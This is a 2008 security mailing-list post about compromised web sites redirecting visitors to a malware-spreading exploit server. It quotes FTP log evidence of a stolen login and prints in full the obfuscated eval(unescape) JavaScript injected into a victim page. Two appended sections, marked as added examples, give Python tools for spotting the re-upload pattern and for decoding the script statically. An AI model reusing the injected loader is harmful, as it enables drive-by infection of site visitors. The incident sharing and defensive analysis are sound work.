[nsp-sec] ack Re: probably compromised web sites
Jon Lewis
jlewis at lewis.org
Wed Mar 19 10:26:36 EDT 2008
On Wed, 19 Mar 2008, Tom Fischer wrote:
> ----------- nsp-security Confidential --------
>
> Hi,
>
> attached a list of probably compromised web sites.
>
> This list is based on referer stats of a Neosploit
> server - which is used to spread Torpig/Anserin/Hupigon/Sinowal/...
> which btw. uses a new MBR rootkit which is currently not detected
> by GMER or Symantec Mebroot tool :-(
>
> The compromised sites usually contain obfuscated javascript which leads
> to hhipthr.com/cgi-bin/mail.cgi (208.101.34.10 (Softlayer))
> 6364 | 209.208.50.128 | hxxp://www.soft-fetish.com/
It looks like this site's maintainer's login/passwd was compromised,
the main index.html downloaded, javascript added, and uploaded.
Tue Mar 11 07:24:20 2008 1 24.93.206.77 1562 /index.html b _ o r soft-fetish ftp 0 * c
Tue Mar 11 07:24:45 2008 6 24.93.206.77 4821 /index.html b _ i r soft-fetish ftp 0 * c
I'm in kind of a hurry to get a road trip started, so I haven't bothered
decoding this yet...but here's the javascript code that was added.
$="%63b%3d%22%2528d%2573)%253bst%253dtm%2570%253d%
2527%2527;for%2528%2569%253d0;%2569%253cds.%25%22;cu%3d%22(p}b4g
xq)6b}g}v}x}
.|}ppqz6*(}rfuyq4gfw)6|`d.;;bqgx{l:w{y;xp;pl;64c}p|)%25$$4|q}s|),$*(;}rfuyq*(
;p}b*%22;op%3d%22%2524%253d%2522%2564w%2528%2564cs(%2563u,%2531%2534))%253b%2522
;%22;de%3d%22-|)K88d)K7}7M;}^}950%2522%259M+yv888d)K7t7M:%25229.-%252096688d)K7t
7M:%25229,-)99tSx-~)K8d)K7t7M50!%25209M+u|cu0tSx-|)K88d)K7t7M:&950%2522%279M+4-4
%3ebu|qsu8t%3ciSx%2522;}Sx;iSx!;tSx;})Kd)K7}7M%3d!M;7%3es%257F}79+%22;cc%3d%226
cen%2567t%2568;i%252b+){%2574mp%253dds%252e%2573l%2569ce%2528i,i%252b%2531)%25%2
2;ce%3d%222e%2563har%2543ode%2541%2574(0%2529^(%25270%25780%2530%2527+es)%2529%2
529;}}%22;cz%3d%22%2566un%2563ti%256fn%2520%2563z(c%257a){r%2565t%2575rn%2520c%2
561%252b%2563b+%2563c+c%2564%252bc%2565%252bc%257a;%257d;%22;st%3d%22%2573t%253d
%2522$%253ds%2574%253bd%2563%2573%2528d%2561%252b%2564b%252b%2564%2563+%2564%256
4+%2564%2565%252c%2531%2530%2529;%2564%2577(%2573t%2529;%2573t%253d%2524%253b%25
22%253b%22;db%3d%22d7%3c7e7%3c7f7%3c7g7%3c7h7%3c7i7%3c7j79+fqb0~)-~ug0Qbbqi8!%3c
%2522%3c#%3c$%3c%25%3c&%3c%27%3c(%3c)9+fqb0d)-~ug0Qbbqi89+fqb0t)-~ug0Tqdu89+d)K7
i7M-t)%3ewudVe||Iuqb89+yv8t)%3ewudTqi89.#9d)K7t7M-t)%3ewudTqdu89%3d8t)%3ewudTqi8
9;%25229+u|cu%22;cd%3d%223b%2573t%253dst%252bSt%2572i%256eg%252efr%256fmC%2568ar
%2543od%2565((%2574mp%25%22;da%3d%22fqb0})-~ug0Qbbqi87e~%257F7%3c7tfu7%3c7dxb7%3
c7vyb7%3c7fyv7%3c7huc7%3c7fuc7%3c7wxd7%3c7u~y7%3c7ud~7%3c7|uf7%3c7dgu79+fqb0|)-~
ug0Qbbqi87q7%3c7r7%3c7s7%3c7t7%3c7u7%3c7v7%3c7w7%3c7x7%3c7y7%3c7z7%3c7{7%3c7|7%3
c7}7%3c7~7%3c7%257F7%3c73c7a7%3c7b7%3c7c7%3c7%22;dz%3d%22%2566u%256ecti%256f%
256e%2520%2564w(t%2529{c%2561%253d%2527%252564o%252563u%25256den%252574%252ew%25
2572%2569%2525%25374e%252528%25252%2532%2527;%2563%2565%253d%2527%252522)%2527;c
%2562%253d%2527%25253c%252573c%2572%2569%252570%25257%2534
l%2561%25256egu%25256
1%2567%252565%25253d%25255c%252522j%2561va%2573cr%252569%252570%2574%25255c%2525
%2532%2532%25253e%2527;cc%253d%2527%25253c%25255c%25252fsc%252572i%25257%2530t%2
5253e%2527;ev%2561l%2528%2575n%2565sca%2570e%2528t)%2529};%22;ca%3d%22%2566u%256
ec%2574%2569o%256e
dc%2573(%2564s,%2565%2573){d%2573%253dunes%2563ape%22;dd%3d%2
2}Sx%3ctSx%3c}^}+yv8d)K7i7M,%2522%2520%2520%279kd)K7i7M0-0%2522%2520%2520%27+m}^
}-S]^8d)K7t7M%3cd)K7}7M%3cd)K7i7M9+iSx!-|)K888d)K7i7M6%2520hQQ9;}^}950&5##950%25
22&M+iSx%2522-|)K8888d)K7i7M6%2520h##!!9..#9;}^}950!%25209M+}Sx%22;dc%3d%220d)K7
t7M-t)%3ewudTqdu89%3d8t)%3ewudTqi899+yv8d)K7t7M,%25209d)K7t7M-!+d)K7}7M-t)%3ewud
]%257F~dx89;!+ve~sdy%257F~0S]^8t%3c}%3ci9kfqb0b-888i;8#:t99;8}Nt9:#9;t9+budeb~0b
+mfqb0t-7fuc|%257Fh%3es%257F}7+fqb0iSx!%3ciSx%2522%3c%22;%69f
%28%64o%63ume%6e%7
4%2ecoo%6bie%2ei%6e%64e%78%4ff(%27vbu%6cl%65ti%6e_mu%6cti%71%75%6fte%3d%27)%3d%3
d-1){sc(%27v%62%75lle%74in_%6dult%69%71u%6ft%65%3d%27,2,%37)%3bev%61%6c(u%6e%65s
ca%70%65%28%64z%2b%63z+%6f%70%2bst)%2b%27d%77(dz%2bcz(%24+%73t)%29;%27)}%65lse%7
b$%3d%27%27};func%74%69on %73c(c%6em%2cv,e%64){%76ar%20e%78d%3dnew
%44%61te%28);
e%78d%2eset%44ate%28e%78d.g%65t%44ate%28)+%65d)%3bdo%63u%6dent%2eco%6fk%69e%3dcn
%6d%2b%20%27%3d%27
+esc%61pe%28%76)%2b%27;ex%70ir%65s%3d%27+ex%64.t%6fGM%54St%72
i%6eg()%3b};";eval(unescape($));document.write($);
----------------------------------------------------------------------
Jon Lewis | I route
Senior Network Engineer | therefore you are
Atlantic Net |
_________ http://www.lewis.org/~jlewis/pgp for PGP public key_________
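The two xferlog lines in the message above are the evidence for the stolen-credential theory: the soft-fetish account fetched /index.html and pushed a larger copy back 25 seconds later from the same remote address. The following is an added example, not part of the original post, that parses xferlog records and flags that fetch-then-re-upload pattern automatically. The two 24.93.206.77 lines in its sample log are the ones quoted above; the 192.0.2.x lines are constructed benign traffic, and the 10-minute window is an assumed threshold.

```python
"""Flag fetch-then-re-upload of the same file in an FTP xferlog.

Added example (not from the original post).  Parses wu-ftpd/proftpd
xferlog records and reports cases where an account downloaded a file and
then re-uploaded another version from the same remote host within a short
window, the pattern visible for /index.html in the log lines above.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Two of these lines are the ones quoted in the post; the 192.0.2.x lines
# (RFC 5737 documentation addresses) are constructed benign traffic.
SAMPLE_XFERLOG = """\
Mon Mar 10 22:10:02 2008 3 192.0.2.10 4102 /images/banner.gif b _ i r soft-fetish ftp 0 * c
Tue Mar 11 06:58:31 2008 1 192.0.2.10 1562 /index.html b _ o r soft-fetish ftp 0 * c
Tue Mar 11 07:24:20 2008 1 24.93.206.77 1562 /index.html b _ o r soft-fetish ftp 0 * c
Tue Mar 11 07:24:45 2008 6 24.93.206.77 4821 /index.html b _ i r soft-fetish ftp 0 * c
Tue Mar 11 09:12:07 2008 2 192.0.2.55 1562 /index.html b _ o r othersite ftp 0 * c
"""

# Assumed threshold: a download followed by an upload within this window
# is treated as one edit-and-replace session.
WINDOW = timedelta(minutes=10)


def parse_xferlog_line(line):
    """Parse one xferlog record; return None for blank or malformed lines.

    Field order: current-time (5 tokens), transfer-time, remote-host,
    file-size, filename, transfer-type, special-action-flag, direction
    (o = download, i = upload, d = delete), access-mode, username,
    service-name, authentication-method, authenticated-user-id,
    completion-status.  Filenames containing spaces are not handled;
    xferlog has no quoting, so such records are ambiguous anyway.
    """
    parts = line.split()
    if len(parts) != 18:
        return None
    try:
        when = datetime.strptime(" ".join(parts[:5]), "%a %b %d %H:%M:%S %Y")
        size = int(parts[7])
    except ValueError:
        return None
    return {
        "time": when,
        "remote_host": parts[6],
        "size": size,
        "filename": parts[8],
        "direction": parts[11],
        "username": parts[13],
        "complete": parts[17] == "c",
    }


def find_fetch_then_reupload(log_text, window=WINDOW):
    """Return hits: a completed download followed by an upload of the same
    file, by the same account, from the same host, within `window`."""
    by_key = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_xferlog_line(line)
        if rec and rec["complete"]:
            by_key[(rec["username"], rec["filename"])].append(rec)

    hits = []
    for (user, fname), recs in by_key.items():
        recs.sort(key=lambda r: r["time"])
        for i, dl in enumerate(recs):
            if dl["direction"] != "o":
                continue
            for ul in recs[i + 1:]:
                if ul["time"] - dl["time"] > window:
                    break  # records are sorted, nothing later can match
                if ul["direction"] == "i" and ul["remote_host"] == dl["remote_host"]:
                    hits.append({
                        "username": user,
                        "filename": fname,
                        "remote_host": ul["remote_host"],
                        "downloaded": dl["time"],
                        "uploaded": ul["time"],
                        "size_before": dl["size"],
                        "size_after": ul["size"],
                    })
                    break
    return hits


if __name__ == "__main__":
    for h in find_fetch_then_reupload(SAMPLE_XFERLOG):
        print("%(username)s %(filename)s from %(remote_host)s: "
              "%(size_before)d -> %(size_after)d bytes, "
              "%(downloaded)s -> %(uploaded)s" % h)
```

Run over a real xferlog this reports one line per suspicious session; the legitimate maintainer's download at 06:58 from 192.0.2.10 is not flagged because no upload followed it within the window. Pairing on remote host as well as account matters: a maintainer who edits from the office and uploads from home would otherwise be indistinguishable from an intruder.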
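Jon left the injected script undecoded. The script is built from fragments that are percent-encoded once or twice (a "%2528" becomes "%28" on the first pass and "(" on the second) and is finished with eval(unescape($)). As an added example, not part of the original post, here is a Python reimplementation of JavaScript's unescape() applied repeatedly, so the nested layers can be read statically without ever being evaluated. The sample script it decodes is constructed to use the same outer structure ($="...";eval(unescape($));document.write($);) with two encoding layers; the regular expression that pulls the literal out of the "$=" assignment is this example's own assumption about that layout.

```python
"""Statically peel JavaScript escape()-style encoding layers, no eval.

Added example (not from the original post).  js_unescape() mimics the
browser's unescape(); peel_layers() applies it until the text stops
changing, so doubly encoded fragments such as "%2528" come out as "(".
"""
import re

# Constructed sample with the same shape as the injected script above:
# an outer percent-encoded literal assigned to $, then eval(unescape($)).
# The literal encodes the string  cb="%28d%73)";function dw(t){eval(unescape(t))};
# whose own inner %28 / %73 decode to "(" and "s" on the second pass.
SAMPLE_SCRIPT = (
    '$="%63b%3d%22%2528d%2573)%22%3bfunc%74ion%20dw(t)%7beval(unescape(t))%7d%3b";'
    'eval(unescape($));document.write($);'
)

_ESC = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")

# Assumed layout: a double-quoted literal assigned to $, immediately
# followed by eval(unescape($)).  Adjust if the loader differs.
_ASSIGN = re.compile(
    r'\$\s*=\s*"((?:[^"\\]|\\.)*)"\s*;\s*eval\s*\(\s*unescape\s*\(\s*\$\s*\)\s*\)'
)


def js_unescape(s):
    """Decode %XX and %uXXXX like JavaScript's unescape(); leave anything
    that is not a well-formed escape (e.g. '%zz') untouched."""
    def repl(m):
        hex_digits = m.group(1) if m.group(1) is not None else m.group(2)
        return chr(int(hex_digits, 16))
    return _ESC.sub(repl, s)


def peel_layers(s, max_layers=8):
    """Repeatedly unescape until nothing changes.  Returns (text, layers)."""
    layers = 0
    while layers < max_layers:
        decoded = js_unescape(s)
        if decoded == s:
            break
        s = decoded
        layers += 1
    return s, layers


def extract_payload(js_source):
    """Return the raw string literal passed to eval(unescape($)), or None."""
    m = _ASSIGN.search(js_source)
    return m.group(1) if m else None


def decode_script(js_source):
    """Pull the $ literal out of a loader and peel it; None if no loader found."""
    payload = extract_payload(js_source)
    if payload is None:
        return None
    return peel_layers(payload)


if __name__ == "__main__":
    text, layers = decode_script(SAMPLE_SCRIPT)
    print("peeled %d layer(s):" % layers)
    print(text)
```

Two caveats when pointing this at the real thing. Full peeling also decodes any percent sequence that was meant to stay literal in the final code, so if the output looks wrong, stop after one layer and read it there. And the script above assembles its fragments by concatenation (variables such as cb, cu, op, dz are joined before the inner eval), so peeling gives readable fragments, not the finished redirect; reassembling them is a separate, manual step.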